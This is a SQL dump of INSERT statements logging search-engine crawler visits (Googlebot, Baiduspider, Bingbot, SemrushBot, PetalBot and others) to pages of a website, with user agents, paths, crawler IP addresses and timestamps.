INSERT INTO `ey_weapp_spider_visit` VALUES ('95547', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/77.html', '66.249.79.108', '1660885797', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96367', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/102.html', '66.249.79.108', '1661275297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95543', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/127.html', '116.179.32.108', '1660880314', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95539', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/452.html', '114.119.151.155', '1660877787', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95545', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/173.html', '207.46.13.52', '1660883689', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96370', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/92.html', '116.179.32.28', '1661277247', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96371', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/447.html', '116.179.32.18', '1661280519', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95546', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/225.html', '220.181.108.114', '1660885228', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96369', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/473.html', '185.191.171.16', '1661277193', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95549', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/494.html', '185.191.171.25', '1660887240', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95531', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.128', '1660875219', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95535', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_40.html', '185.191.171.15', '1660875717', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95550', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/88.html', '216.244.66.194', '1660887956', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95522', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_4.html', '116.179.32.209', '1660865585', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95521', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/198.html', '66.249.79.112', '1660865192', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95523', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.112', '1660866853', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95512', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_38/', '185.191.171.33', '1660862244', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95513', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/75.html', '185.191.171.9', '1660862800', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95509', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/116_3.html', '185.191.171.38', '1660861217', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95505', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/192.html', '114.119.151.155', '1660859087', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95504', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_12/', '114.119.151.155', '1660858777', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95489', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/175.html', '185.191.171.2', '1660852001', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95499', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_8/', '185.191.171.10', '1660856832', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95488', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/298.html', '185.191.171.36', '1660851895', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95500', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/339.html', '66.249.79.110', '1660856890', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95485', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/149.html', '185.191.171.5', '1660850783', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95491', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/220.html', '114.119.151.155', '1660854197', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95484', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/24_3.html', '185.191.171.43', '1660849903', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96538', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/changjianwenda/list_20_3/', '216.244.66.194', '1661353040', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96527', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661347733', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96528', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661347735', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95571', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/131.html', '114.119.151.155', '1660902274', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96523', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_30/', '216.244.66.194', '1661346803', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96524', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/90.html', '220.181.108.114', '1661346847', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96525', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/444.html', '66.249.79.110', '1661347413', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95516', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/442.html', '114.119.151.153', '1660863597', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95765', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/index.php', '66.249.79.110', '1660994562', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95515', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zhaoyang.html', '114.119.151.153', '1660863446', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95537', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/297.html', '114.119.151.155', '1660876817', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96375', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hnbe.html', '114.119.151.153', '1661283078', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95538', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/yqal/', '66.249.79.110', '1660877257', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95540', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/46.html', '185.191.171.20', '1660878115', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95558', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/363.html', '66.249.79.112', '1660894101', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95542', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.108', '1660880089', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95548', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.112', '1660886898', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95555', '6', 'mozilla/5.0 applewebkit/537.36 (khtml, like gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) chrome/103.0.5060.134 safari/537.36', '/', '207.46.13.9', '1660893940', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96366', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_45/', '185.191.171.9', '1661274831', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95604', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/413.html', '185.191.171.20', '1660925102', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95575', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tjs.html', '114.119.151.153', '1660902817', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95576', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_40/', '114.119.151.155', '1660902950', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95592', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_38.html', '185.191.171.35', '1660913729', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95589', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660911003', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95591', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.110', '1660911413', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95580', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/355.html', '114.119.151.153', '1660903490', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95586', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/news/165.html', '42.236.10.109', '1660909899', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95587', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660910956', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95582', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/90.html', '220.181.108.157', '1660906495', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95583', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljwd/list_20_6/', '185.191.171.14', '1660906537', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95584', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bc/', '114.119.151.153', '1660906742', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95588', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/80.html', '185.191.171.19', '1660910997', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95593', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/44_4.html', '220.181.108.105', '1660913857', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95595', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_37/', '220.181.108.84', '1660918766', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95602', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '154.23.189.227', '1660922625', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95598', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/100.html', '216.244.66.194', '1660919936', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95597', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/92.html', '216.244.66.194', '1660919799', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95599', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_18.html', '185.191.171.24', '1660919988', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95600', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/167.html', '220.181.108.174', '1660921222', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95601', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_23.html', '185.191.171.8', '1660922126', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95646', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660940236', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95607', '99', 'mozilla/5.0 (compatible; neevabot/1.0; +https://neeva.com/neevabot)', '/products/81.html', '54.161.41.102', '1660925665', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95644', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_2.html', '220.181.108.147', '1660939848', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95608', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/19_4.html', '185.191.171.9', '1660925758', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95609', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_34.html', '116.179.32.209', '1660925949', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95610', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/426.html', '185.191.171.34', '1660926294', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95612', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_9.html', '185.191.171.41', '1660926615', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95614', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_37/', '185.191.171.41', '1660926806', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95613', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '42.194.242.213', '1660926791', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95640', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/', '116.179.32.93', '1660938579', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95641', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/123.html', '114.119.151.153', '1660938684', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95642', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/index.php', '66.249.79.110', '1660939577', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95681', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_37/', '185.191.171.45', '1660953648', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95672', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/99.0.4844.84 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1660950067', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95647', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1660940529', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95648', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/113.html', '116.179.32.138', '1660941118', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95649', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '154.23.189.227', '1660941817', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95663', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.110', '1660947004', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95651', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.110', '1660942419', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95732', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_21.html', '116.179.32.164', '1660975890', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95656', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/402.html', '185.191.171.21', '1660944377', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95727', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/57.html', '66.249.79.112', '1660971961', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95728', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/214.html', '66.249.79.108', '1660972406', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95673', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.187', '1660950667', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95674', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/194.html', '116.179.32.72', '1660951269', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98015', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/106.html', '185.191.171.15', '1662002976', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95675', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_31.html', '185.191.171.9', '1660951742', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95677', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/89.html', '185.191.171.33', '1660952160', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95678', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.110', '1660952298', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95680', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/112.html', '220.181.108.81', '1660952540', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95726', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '154.23.189.227', '1660971805', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95687', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/chukouquanqiu/', '220.181.108.157', '1660955078', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95719', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bcxw/', '185.191.171.4', '1660966980', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95688', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.110', '1660955393', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98012', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/181.html', '185.191.171.2', '1662000164', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95689', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1660955416', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95690', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/120.html', '116.179.32.223', '1660956347', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95692', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/23_3.html', '185.191.171.3', '1660958807', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95694', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/298.html', '114.119.151.153', '1660959110', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95695', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/222.html', '185.191.171.10', '1660959184', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98005', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '154.23.189.227', '1661998065', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95605', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/106.html', '185.191.171.8', '1660925518', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95606', '99', 'mozilla/5.0 (compatible; neevabot/1.0; +https://neeva.com/neevabot)', '/products/82.html', '54.161.41.102', '1660925655', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95573', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/411.html', '114.119.151.153', '1660902535', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95551', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_59/', '66.249.79.110', '1660888445', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96365', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/6.html', '185.191.171.22', '1661274301', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95568', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/389.html', '114.119.151.155', '1660901628', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95569', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_64/', '185.191.171.13', '1660902134', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95763', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_13.html', '185.191.171.11', '1660990918', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95557', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/496.html', '66.249.79.108', '1660894069', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95620', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/289.html', '66.249.79.110', '1660929782', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95621', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660930197', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95622', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jx.html', '114.119.151.153', '1660930325', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95757', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/8_3.html', '116.179.32.21', '1660985652', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96169', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/news/491.html', '123.125.109.42', '1661217458', '0');
